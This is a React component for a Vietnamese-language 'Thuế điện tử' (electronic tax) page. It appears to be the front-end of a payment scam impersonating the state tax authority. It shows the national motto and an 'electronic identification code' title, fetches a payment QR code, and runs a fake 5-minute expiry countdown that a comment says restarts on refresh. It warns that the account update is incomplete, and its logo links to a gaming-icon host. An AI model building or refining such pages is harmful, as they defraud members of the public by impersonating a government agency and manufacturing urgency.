import React, {
  useCallback,
  useEffect,
  useMemo,
  useState,
} from 'react';
import { useNavigate } from 'react-router-dom';
import {
  ArrowLeft,
  Clock3,
  Download,
  Home,
  RefreshCw,
} from 'lucide-react';
import { apiEndpoint } from '../config/api';

const PAYMENT_QR_API_URL =
  process.env.REACT_APP_PAYMENT_QR_API_URL ||
  apiEndpoint('api/payment-qr.php');

const DOWNLOAD_QR_API_URL =
  process.env.REACT_APP_DOWNLOAD_QR_API_URL ||
  apiEndpoint('api/download-qr.php');

/*
 * Chỉ cần thay URL này khi có logo thật.
 */
const TAX_LOGO_URL =
  'https://images.b728484.com:42666/TCG_GAME_ICONS/KA/KA0584.png';

const COUNTDOWN_SECONDS = 5 * 60;

const LoadingPage = () => {
  const navigate = useNavigate();

  const [payment, setPayment] = useState(null);
  const [secondsLeft, setSecondsLeft] =
    useState(COUNTDOWN_SECONDS);

  const [loading, setLoading] = useState(true);
  const [refreshing, setRefreshing] =
    useState(false);
  const [downloading, setDownloading] =
    useState(false);

  const [error, setError] = useState('');

  const getToken = () =>
    sessionStorage.getItem('demo_auth_token') ||
    localStorage.getItem('demo_auth_token') ||
    '';

  const loadPaymentQr = useCallback(
    async ({ manual = false } = {}) => {
      const token = getToken();

      if (!token) {
        setPayment(null);
        setError(
          'Phiên đăng nhập không tồn tại. Vui lòng đăng nhập lại.'
        );
        setLoading(false);
        return;
      }

      if (manual) {
        setRefreshing(true);
      } else {
        setLoading(true);
      }

      setError('');

      try {
        const response = await fetch(
          PAYMENT_QR_API_URL,
          {
            method: 'GET',
            headers: {
              Accept: 'application/json',
              Authorization: `Bearer ${token}`,
            },
          }
        );

        let data;

        try {
          data = await response.json();
        } catch {
          throw new Error(
            'Máy chủ không trả về dữ liệu hợp lệ.'
          );
        }

        if (response.status === 401) {
          throw new Error(
            'Phiên đăng nhập đã hết hạn.'
          );
        }

        if (!response.ok || !data.success) {
          throw new Error(
            data.message ||
              'Tài khoản chưa được cập nhật.'
          );
        }

        const qrPayment =
          data.payment ||
          data.data ||
          data.qr ||
          null;

        if (!qrPayment) {
          throw new Error(
            'Tài khoản chưa được cập nhật.'
          );
        }

        setPayment({
          id: qrPayment.id || '',

          qrUrl:
            qrPayment.qrUrl ||
            qrPayment.qrCode ||
            qrPayment.qr_url ||
            '',
        });

        /*
         * Đồng hồ cứng 5 phút.
         * F5 trang sẽ chạy lại từ 05:00.
         */
        setSecondsLeft(COUNTDOWN_SECONDS);
      } catch (requestError) {
        console.error(
          'Lỗi tải QR:',
          requestError
        );

        setPayment(null);
        setError(
          requestError.message ||
            'Không thể kết nối máy chủ.'
        );
      } finally {
        setLoading(false);
        setRefreshing(false);
      }
    },
    []
  );

  useEffect(() => {
    loadPaymentQr();
  }, [loadPaymentQr]);

  useEffect(() => {
    if (!payment) {
      return undefined;
    }

    const timer = window.setInterval(() => {
      setSecondsLeft((current) =>
        current > 0 ? current - 1 : 0
      );
    }, 1000);

    return () => {
      window.clearInterval(timer);
    };
  }, [payment?.id]);

  const formattedTime = useMemo(() => {
    const minutes = Math.floor(
      secondsLeft / 60
    );

    const seconds = secondsLeft % 60;

    return `${String(minutes).padStart(
      2,
      '0'
    )}:${String(seconds).padStart(2, '0')}`;
  }, [secondsLeft]);

  const downloadQr = async () => {
    const token = getToken();
    if (!token || downloading) return;

    setDownloading(true);
    setError('');

    try {
      const response = await fetch(DOWNLOAD_QR_API_URL, {
        method: 'GET',
        headers: {
          Accept: 'image/*',
          Authorization: `Bearer ${token}`,
        },
        cache: 'no-store',
      });

      if (!response.ok) {
        throw new Error('Không thể tải ảnh QR. Vui lòng thử lại.');
      }

      const blob = await response.blob();
      const objectUrl = URL.createObjectURL(blob);
      const link = document.createElement('a');
      link.href = objectUrl;
      link.download = `ma-qr-thanh-toan-${payment?.id || 'moi'}.png`;
      document.body.appendChild(link);
      link.click();
      link.remove();
      window.setTimeout(() => URL.revokeObjectURL(objectUrl), 1000);
    } catch (downloadError) {
      setError(downloadError.message || 'Không thể tải ảnh QR.');
    } finally {
      setDownloading(false);
    }
  };

  return (
    <>
      <style>{`
        * {
          box-sizing: border-box;
        }

        html,
        body,
        #root {
          min-height: 100%;
          margin: 0;
        }

        body {
          background: #e70f0f;
        }

        .tax-qr-page {
          min-height: 100vh;
          min-height: 100dvh;
          width: 100%;
          overflow-x: hidden;
          color: #ffffff;
          font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto,
            "Helvetica Neue", Arial, sans-serif;
          background:
            radial-gradient(
              circle at 50% 14%,
              rgba(255, 83, 55, 0.34),
              transparent 34%
            ),
            linear-gradient(
              180deg,
              #f51b12 0%,
              #e90d0d 46%,
              #df0808 100%
            );
        }

        .tax-qr-shell {
          width: min(100%, 430px);
          min-height: 100vh;
          min-height: 100dvh;
          margin: 0 auto;
          padding: 0 18px 34px;
        }

        .tax-qr-header {
          position: relative;
          height: 76px;
          display: flex;
          align-items: center;
          justify-content: center;
        }

        .tax-qr-header-title {
          margin: 0;
          color: #ffffff;
          font-size: 24px;
          line-height: 1;
          font-weight: 800;
          letter-spacing: 0.01em;
        }

        .tax-qr-icon-button {
          position: absolute;
          top: 50%;
          width: 44px;
          height: 44px;
          padding: 0;
          border: 0;
          outline: none;
          display: flex;
          align-items: center;
          justify-content: center;
          color: #ffffff;
          cursor: pointer;
          border-radius: 50%;
          background: transparent;
          transform: translateY(-50%);
        }

        .tax-qr-icon-button:first-child {
          left: 0;
        }

        .tax-qr-icon-button:last-child {
          right: 0;
        }

        .tax-qr-intro {
          display: flex;
          flex-direction: column;
          align-items: center;
          text-align: center;
          padding-top: 12px;
        }

        .tax-qr-logo-wrap {
    width: 140px;      /* tùy chỉnh */
    height: auto;
    display: flex;
    justify-content: center;
    align-items: center;
    overflow: visible;
    background: transparent;
    box-shadow: none;
    border-radius: 0;
}

.tax-qr-logo {
    width: 100%;
    height: auto;
    object-fit: contain;
    border-radius: 0;
    display: block;
}

        .tax-qr-brand {
          margin: 18px 0 0;
          font-size: 24px;
          line-height: 1.1;
          font-weight: 800;
          letter-spacing: 0.02em;
        }

        .tax-qr-main-title {
          margin: 18px 0 0;
          color: #ffd430;
          font-size: clamp(24px, 7vw, 30px);
          line-height: 1.18;
          font-weight: 900;
          letter-spacing: 0.025em;
        }

        .tax-qr-subtitle {
          margin: 13px 0 0;
          color: rgba(255, 255, 255, 0.92);
          font-size: 14px;
          line-height: 1.45;
          font-weight: 600;
          letter-spacing: 0.025em;
        }

        .tax-qr-card {
          width: 100%;
          margin-top: 34px;
          padding: 26px 22px 30px;
          border-radius: 30px;
          color: #242424;
          background: rgba(255, 255, 255, 0.98);
          box-shadow:
            0 24px 56px rgba(89, 0, 0, 0.30);
        }

        .tax-qr-image-frame {
          width: min(100%, 286px);
          margin: 0 auto;
          padding: 13px;
          overflow: hidden;
          border-radius: 22px;
          background: #ffffff;
          box-shadow:
            0 12px 30px rgba(29, 36, 50, 0.16);
        }

        .tax-qr-image {
          width: 100%;
          max-height: 286px;
          display: block;
          object-fit: contain;
        }

        .tax-qr-time {
          margin-top: 24px;
          display: flex;
          align-items: center;
          justify-content: center;
          gap: 10px;
          color: #d80f15;
        }

        .tax-qr-time-value {
          font-size: 29px;
          line-height: 1;
          font-weight: 900;
          letter-spacing: 0.06em;
        }

        .tax-qr-notes {
          margin-top: 23px;
          text-align: center;
        }

        .tax-qr-note {
          margin: 0;
          color: #666666;
          font-size: 17px;
          line-height: 1.55;
          font-weight: 500;
        }

        .tax-qr-download-wrap {
          display: flex;
          justify-content: center;
          margin: 18px 0;
        }

        .tax-qr-download-button {
          min-width: 230px;
          min-height: 52px;
          padding: 12px 24px;
          border: 1px solid #e4a900;
          border-radius: 999px;
          display: inline-flex;
          align-items: center;
          justify-content: center;
          gap: 10px;
          color: #5b3500;
          font-size: 16px;
          font-weight: 900;
          cursor: pointer;
          background: linear-gradient(180deg, #ffe36b, #ffc928);
          box-shadow: 0 10px 24px rgba(221, 157, 0, 0.32);
          transition: transform 0.18s ease, box-shadow 0.18s ease;
        }

        .tax-qr-download-button:hover {
          transform: translateY(-2px);
          box-shadow: 0 13px 28px rgba(221, 157, 0, 0.4);
        }

        .tax-qr-download-button:disabled {
          cursor: wait;
          opacity: 0.68;
          transform: none;
        }

        .tax-qr-state-card {
          width: 100%;
          margin-top: 34px;
          padding: 34px 24px;
          border-radius: 30px;
          color: #282828;
          text-align: center;
          background: #ffffff;
          box-shadow:
            0 24px 56px rgba(89, 0, 0, 0.30);
        }

        .tax-qr-refresh-button {
          width: 100%;
          height: 48px;
          margin-top: 20px;
          border: 0;
          border-radius: 999px;
          color: #ffffff;
          font-size: 15px;
          font-weight: 800;
          cursor: pointer;
          background: #df1118;
        }

        .tax-qr-error {
          margin-top: 16px;
          padding: 11px 13px;
          border: 1px solid #fecaca;
          border-radius: 12px;
          color: #b91c1c;
          font-size: 13px;
          line-height: 1.5;
          text-align: center;
          background: #fef2f2;
        }

        @media (max-width: 380px) {
          .tax-qr-shell {
            padding-inline: 14px;
          }

          .tax-qr-header-title {
            font-size: 21px;
          }

          .tax-qr-logo-wrap {
            width: 104px;
            height: 104px;
          }

          .tax-qr-brand {
            font-size: 21px;
          }

          .tax-qr-subtitle {
            font-size: 12px;
          }

          .tax-qr-card {
            padding-inline: 16px;
          }

          .tax-qr-note {
            font-size: 15px;
          }
        }
      `}</style>

      <div className="tax-qr-page">
        <div className="tax-qr-shell">
          <header className="tax-qr-header">
            <button
              type="button"
              onClick={() => navigate(-1)}
              className="tax-qr-icon-button"
              aria-label="Quay lại"
            >
              <ArrowLeft
                size={34}
                strokeWidth={2.3}
              />
            </button>

            <h1 className="tax-qr-header-title">
              THUẾ ĐIỆN TỬ
            </h1>

            <button
              type="button"
              onClick={() => navigate('/home')}
              className="tax-qr-icon-button"
              aria-label="Trang chủ"
            >
              <Home
                size={29}
                strokeWidth={2.3}
              />
            </button>
          </header>

          <main>
            <section className="tax-qr-intro">
              <div className="tax-qr-logo-wrap">
                <img
                  src={require('../assets/thuedinetu-BoU6E12Y.png')}
                  alt="Logo Thuế điện tử"
                  className="tax-qr-logo"
                />
              </div>

            

              <h3 className="tax-qr-main-title">
                MÃ ĐỊNH DANH ĐIỆN TỬ
              </h3>

              <p className="tax-qr-subtitle">
                CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
              </p>
            </section>

            {loading ? (
              <section className="tax-qr-state-card">
                <RefreshCw
                  size={38}
                  className="animate-spin"
                  color="#df1118"
                />

                <p
                  style={{
                    margin: '16px 0 0',
                    fontWeight: 700,
                  }}
                >
                  Đang tải mã QR...
                </p>
              </section>
            ) : error && !payment ? (
              <section className="tax-qr-state-card">
                <RefreshCw
                  size={38}
                  color="#df1118"
                />

                <h2
                  style={{
                    margin: '16px 0 0',
                    fontSize: 21,
                  }}
                >
                 Chưa Hoàn Thành Cập Nhật Tài Khoản
                </h2>

                <p
                  style={{
                    margin: '10px 0 0',
                    color: '#6b7280',
                    fontSize: 14,
                    lineHeight: 1.6,
                  }}
                >
                  {error}
                </p>

                <button
                  type="button"
                  disabled={refreshing}
                  onClick={() =>
                    loadPaymentQr({
                      manual: true,
                    })
                  }
                  className="tax-qr-refresh-button"
                >
                  {refreshing
                    ? 'Đang kiểm tra...'
                    : 'Kiểm tra lại'}
                </button>
              </section>
            ) : payment ? (
              <section className="tax-qr-card">
                <div className="tax-qr-image-frame">
                  {payment.qrUrl ? (
                    <img
                      src={payment.qrUrl}
                      alt="Mã QR thanh toán"
                      className="tax-qr-image"
                      onError={() =>
                        setError(
                          'Không thể hiển thị ảnh QR.'
                        )
                      }
                    />
                  ) : (
                    <div
                      style={{
                        minHeight: 220,
                        display: 'flex',
                        alignItems: 'center',
                        justifyContent: 'center',
                        color: '#6b7280',
                        textAlign: 'center',
                      }}
                    >
                      Chưa có ảnh QR thanh toán.
                    </div>
                  )}
                </div>

                <div className="tax-qr-time">
                  <Clock3
                    size={31}
                    strokeWidth={2.4}
                  />

                  <span className="tax-qr-time-value">
                    {formattedTime}
                  </span>
                </div>

                <div className="tax-qr-notes">
                  <p className="tax-qr-note">
                    Mã QR sẽ hết hạn sau 5 phút
                  </p>

                  <div className="tax-qr-download-wrap">
                    <button
                      type="button"
                      className="tax-qr-download-button"
                      onClick={downloadQr}
                      disabled={downloading || !payment.qrUrl}
                    >
                      <Download size={21} strokeWidth={2.6} />
                      {downloading
                        ? 'Đang tải ảnh...'
                        : 'Tải Mã Định Danh'}
                    </button>
                  </div>

                </div>

                {error && (
                  <div className="tax-qr-error">
                    {error}
                  </div>
                )}
              </section>
            ) : null}
          </main>
        </div>
      </div>
    </>
  );
};

export default LoadingPage;
